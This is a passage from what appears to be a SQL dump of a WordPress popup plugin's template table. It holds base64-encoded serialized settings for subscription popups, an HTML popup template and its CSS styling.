iJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6MTk1OiLQodGB0YvQu9C60LAg0LTQu9GPINC/0L7QtNGC0LLQtdGA0LbQtNC10L3QuNGPINCx0YvQuyDQvtGC0L/RgNCw0LLQu9C10L3QsCDQvdCwINCy0LDRiCDQsNC00YDQtdGBINGN0LvQtdC60YLRgNC+0L3QvdC+0Lkg0L/QvtGH0YLRiy4g0J/RgNC+0LLQtdGA0YzRgtC1INCy0LDRiNGDINGN0LvQtdC60YLRgNC+0L3QvdGD0Y4g0L/QvtGH0YLRgyEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czo0Mzoi0KHQv9Cw0YHQuNCx0L4g0LfQsCDRgNC10LPQuNGB0YLRgNCw0YbQuNGOISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjU4OiLQn9GD0YHRgtC+0Lkg0LjQu9C4INC90LXQtNC10LnRgdGC0LLQuNGC0LXQu9GM0L3Ri9C5IGVtYWlsIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czo2MToi0J/QvtC00YLQstC10YDQtNC40YLQtSDRgNC10LPQuNGB0YLRgNCw0YbQuNGOINC90LAgW3NpdGVuYW1lXSI7czoyNToicmVnX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MzM0OiLQktGLINC30LDRgNC10LPQuNGB0YLRgNC40YDQvtCy0LDQvdGLINC90LAg0YHQsNC50YLQtSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uINCh0LvQtdC00YPQudGC0LUgIDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4g0LTQu9GPINC30LDQstC10YDRiNC10L3QuNGPINGA0LXQs9C40YHRgtGA0LDRhtC40LguINCV0YHQu9C4INCy0Ysg0L3QtSDQt9Cw0YDQtdCz0LjRgdGC0YDQuNGA0L7QstCw0LvQuNGB0Ywg0LfQtNC10YHRjCAtINC/0YDQvtGB0YLQviDQuNCz0L3QvtGA0LjRgNGD0LnRgtC1INGN0YLQviDRgdC+0L7QsdGJ0LXQvdC40LUuIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjQ1OiJbc2l0ZW5hbWVdICDQktCw0Ygg0LvQvtCz0LjQvSDQuCDQv9Cw0YDQvtC70YwiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjcxOiLQm9C+0LPQuNC9OiBbdXNlcl9sb2dpbl08YnIgLz7Qn9Cw0YDQvtC70Yw6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxNzc6ItCjINCy0LDRgSDQvdC+0LLRi9C5INC/0L7Qu9GM0LfQvtCy0LDRgtC10LvRjCDQvdCwINGB0LDQudGC0LUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCDQstC+0YIg0LjQvdGE0L7RgNC80LDRhtC40Y8g0L/QvtC70YzQt9C+0LLQsNGC0LXQu9GPOiA8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxMjoiY29udGFjdF9mb3JtIjtzOjI6IjE5IjtzOjEyOiJzdGF0X2dhX2NvZGUiO3M6MDoiIjtzOjU6InR4dF8wIjtzOjQ4OiI8cD5bZ29vZ2xlX21hcF9lYXN5IGlkPVwiMVwiIGhlaWdodD1cIjMwMFwiXTwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjMiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<link href=\"https://fonts.googleapis.com/css?family=Lato\" rel=\"stylesheet\" type=\"text/css\" >\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n		</div><!--\r\n		--><div class=\"ppsRightCol\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','@nice-blue: #5B83AD;\r\n#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 0px;\r\n  	font-family: Lato;\r\n	font-size: 13px;\r\n	line-height: normal;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: block;\r\n	text-align: right;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 59%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n	\r\n	vertical-align: middle;\r\n  	display: inline-block;\r\n  	margin: 0px;\r\n	text-align: left;\r\n	\r\n	[if bg_type_0 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\", endColorstr=\"[bg_color_0]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 20px 20px 0;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-moz-placeholder { /* Firefox 19+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-ms-input-placeholder { /* IE 10+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-moz-placeholder { /* Firefox 18- */\r\n    color: #ccc;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-moz-placeholder { /* Firefox 19+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-ms-input-placeholder { /* IE 10+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-moz-placeholder { /* Firefox 18- */\r\n    color: #ccc;\r\n}\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"password\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: Lato;\r\n	font-size: 16px;\r\n	font-weight: normal;\r\n	line-height: normal;\r\n	color: #aaa;\r\n	text-align:center;\r\n	width: 100%;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 0px solid transparent;\r\n	display:block;\r\n    \r\n    margin: 10px 0 0;\r\n	padding: 0 10px 0 10px;\r\n	height: 40px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n	padding-top: 9px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	display: block;\r\n	font-family: Lato;\r\n	font-size: 16px;\r\n	font-weight: normal;\r\n	line-height: normal;\r\n	color: #fff;\r\n	\r\n	margin: 10px 0 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"][name=\"name\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/user-black-icon.png\");\r\n	background-position: 12px center;\r\n	background-repeat: no-repeat;\r\n	background-size: 16px auto;\r\n	padding: 0 25px 0 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/email-black-icon.png\");\r\n	background-position: 11px center;\r\n	background-repeat: no-repeat;\r\n	background-size: 18px auto;\r\n	padding: 0 25px 0 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"submit\"] {\r\n	display: block;\r\n	font-family: Lato;\r\n	font-size: 17px;\r\n	font-weight: bold;\r\n	line-height: normal;\r\n	color: #fff;\r\n  	cursor: pointer;\r\n	margin: 10px 0 0;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 0px solid transparent;\r\n	width: 100%;\r\n	height: 50px;\r\n	\r\n  	[if bg_type_2 == \"color\"]\r\n  	background: [bg_color_2] 100%;\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n  	border-radius: 3px;\r\n	-moz-border-radius: 3px;\r\n	-webkit-border-radius: 3px;\r\n  	min-height: 350px;\r\n  	width: 40%;\r\n	display: inline-block;\r\n  	padding: 20px;\r\n	margin: 0;\r\n	vertical-align: middle;\r\n	\r\n  	[if bg_type_1 == \"color\"]\r\n	background: [bg_color_1];\r\n  	[elseif bg_type_1 == \"img\"]\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color:#ffffff;\r\n  	font-family: \"Lato\";\r\n  	font-weight: normal;\r\n	line-height: normal;\r\n  	font-size: 24px;\r\n	letter-spacing: -1px;\r\n  	padding: 0px;\r\n	margin: 20px 0 0;\r\n  	text-align: center;\r\n  	\r\n    width: 100%;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 100%;\r\n    height: 300px;\r\n	line-height: normal;\r\n  	font-size: 14px;\r\n  	font-family: Lato;\r\n	font-weight: 400;\r\n	\r\n	\r\n	padding: 0px;\r\n	margin: 0;\r\n	\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 p {\r\n	font-size: inherit !important;\r\n	font-weight: inherit !important;\r\n	font-size: inherit !important;\r\n	line-height: inherit !important;\r\n	width: 100%;\r\n	margin: 0;\r\n	padding: 0;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	top:-20px;\r\n  	right:1px;\r\n  	z-index:99999;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #ffffff;\r\n	text-align: center;\r\n    font-family: Lato;\r\n    font-size: x-small;\r\n    font-weight: bold;\r\n    line-height: 14px;\r\n  	margin: 10px 30px 5px;\r\n}','230-6-new-york-prev.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',1,0),(28,'Smart',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6OTQ6e3M6NToid2lkdGgiO3M6MzoiNzcwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czozOiJpbWciO3M6ODoiYmdfaW1nXzAiO3M6NDM6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2JnLWZvcm0tbWFpbi5wbmciO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiIzNkODJiZiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6Mzk6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2J1dHRvbi0xLnBuZyI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjZmZmZmZmIjtzOjk6ImJnX3R5cGVfMiI7czozOiJpbWciO3M6ODoiYmdfaW1nXzIiO3M6NDA6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2Zvcm0tYm9vay5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6MDoiIjtzOjk6ImJnX3R5cGVfMyI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMyI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzMiO3M6NzoiI2VlZWUyMiI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiNmZjQ0MTEiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiIzAwMDAwMCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzk3OTY5NiI7czoxNToicmVzcG9uc2l2ZV9tb2RlIjtzOjM6ImRlZiI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czoxMToiY2xhc3N5X2dyZXkiO3M6NzoiYnVsbGV0cyI7czo0OiJ0aWNrIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6NTc6IkdldCBpdCBOT1chIEluY3JlYXNlIG1vcmUgdGhhbiA3MDAlIG9mIEVtYWlsIFN1YnNjcmliZXJzISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE3OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6MTQ6InBlcnNwZWN0aXZlX3VwIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjY6e3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjIwOiJzdWJfdHh0X2V4aXN0c19lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6MTE6IkdldCBpdCBub3chIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjg6ImxvZ2luX2J5IjtzOjg6InVzZXJuYW1lIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6NToiTG9naW4iO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjg6IlJlZ2lzdGVyIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJyZWdfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToicmVnX3R4dF9zdWNjZXNzIjtzOjI3OiJUaGFuayB5b3UgZm9yIHJlZ2lzdHJhdGlvbiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gcmVnaXN0cmF0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NjoiWW91IHJlZ2lzdGVyZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgcmVnaXN0cmF0aW9uLiBJZiB5b